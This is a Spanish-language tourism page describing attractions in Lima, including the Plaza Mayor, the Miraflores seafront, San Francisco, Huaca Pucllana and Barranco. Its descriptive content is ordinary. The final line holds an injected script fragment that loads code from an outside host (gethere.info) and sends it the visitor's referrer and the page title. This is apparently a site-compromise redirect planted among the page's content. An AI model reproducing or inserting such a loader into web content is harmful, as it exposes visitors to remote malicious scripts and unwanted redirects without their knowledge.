Image

QUICK CONTACT

[contact-form-7 id="2507" title="quick contact"]

Atractivos Turísticos

El Centro Histórico de Lima declarado Patrimonio Cultural de la Humanidad por la UNESCO, es uno de los principales atractivos turísticos de la capital del Perú. La riqueza histórica y cultural de Lima se mantiene viva en la majestuosidad de muchas de sus plazas, calles, casonas, iglesias y monumentos que nos muestran su admirable pasado virreinal, colonial y republicano.

PLAZA MAYOR

La Plaza Mayor de Lima esta ubicada en el centro histórico de Lima. Se dice que fue trazada por Francisco Pizarro y alberga actualmente al Palacio de Gobierno, la Catedral de Lima, el Palacio Arzobispal de Lima, el Palacio Municipal de Lima y del Club de la Unión. Al centro se puede apreciar una hermosa fuente de bronce que data de 1650. Tras una serie de remodelaciones, en 1940 ésta fue uniformada a un solemne estilo neocolonial, con característicos portales por donde transitan sus visitantes.

lima-centro-historico

En el departamento de Lima encontraras playas a un paso de la ciudad, podrás visitaras huacas precolombinas o experimentar caminatas por nevados, áreas naturales y reservadas, lagunas, humedales y cascadas en medio de  escenarios andinos que quitan el aliento.

MALECON DE MIRAFLORES

Miles de personas visitan este corredor con vista al mar compuesto por el Malecón Cisneros, el Malecón de la Reserva y el Malecón 28 de Julio. Allí, se encuentra el faro de la Marina de Guerra. Como deporte, algunos trotan por sus aceras mientras que otros asisten a clases de yoga y tal chi en sus jardines. Desde la cima de sus acantilados se practica ala delta y parapente. Los niños encuentran áreas habilitadas con juegos. Quizás el parque más tradicional de malecón sea el Parque del Amor.

Miraflores

PARQUE DE LA RESERVA Y FUENTES DE AGUA

El Parque del agua es un renovado atractivo de la ciudad de Lima está ubicado en el barrio de Santa Beatriz, en el Cercado de Lima, y destaca por sus trece fuentes de agua, usan tecnología de punta, para presentar un maravilloso espectáculo visual de las fuentes con sonido y luces. La fuente principal posee un chorro de 80 metros, uno de los más altos del mundo. Ideal para los niños.

Parque de las Aguas

Parque de las Aguas

 

IGLESIA Y CONVENTO DE SAN FRANCISCO

Conjunto arquitectónico del siglo XVII. Incluye la iglesia, el convento y la plazuela. El frontis principal del templo fue labrado en piedra y se caracteriza por sus columnas de tipo corintio. En la fachada destaca una cornisa abierta con arcos en la que se aprecia la Inmaculada Concepción. La zona de los claustros, decorados con azulejos, alberga el Museo de Arte Virreinal. Además, se pueden visitar las catacumbas (galerías subterráneas) que sirvieron como cementerio durante la colonia.

sf

TEMPLO Y SANTUARIO DE SANTA ROSA DE LIMA

La iglesia y monasterio de Santa Rosa de Lima, erigido en honor a la patrona de América y Filipinas, fue construido en 1699 y en su interior se conservan la casa natal de la santa, la ermita –construida por ella misma- que usaba para orar y flagelarse, y el famoso pozo de los deseos, donde Rosa arrojó la llave del cinturón que ceñía a su cintura. Entre sus obras de arte tenemos el retrato de la santa hecho por Angelino Medoro. Dirección: Av. Tacna, cuadra 1.

TEMPLO SANTA ROSA

HUACA PUCLLANA

El complejo conocido como Huaca Pucllana fue un centro ceremonial y administrativo de la cultura Lima(200-700 d. C.), que posteriormente fue utilizado como cementerio por los huari. Lo que queda del complejo de adobe es un conjunto de plazas, cuya función estaba relacionada con las actividades cotidianas de la clase religiosa, y una pirámide escalonada vinculada al culto religioso. El museo de sitio exhibe los hallazgos, entre los que destacan las momias huari. Dirección: cuadra 8 de General Borgoño – Miraflores.

huaca

 

BARRANCO Y CHORRILLOS, DISTRITOS DE LIMA

Cruzando el puente Armendáriz, está Barranco, el distrito bohemio de Lima por excelencia. A lo largo de los años, ha sido hogar en Lima de intelectuales, como Mario Vargas Llosa, Fernando de Szyszlo y Chabuca Granda. Barranco es centro de actividad nocturna gracias a sus tradicionales bares y ya emblemáticas discotecas.  Siguiendo por el malecón, se llega a un modernizado Chorrillos. Sus edificios con vista al mar son actualmente de los más lujosos y modernos de Lima; sin embargo, su tradicional costumbre pesquera sigue latente en el muelle de pescadores de Chorrillos.

Puente_de_los_Suspiros_de_noche

 

Fuente: Origen Andinos.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;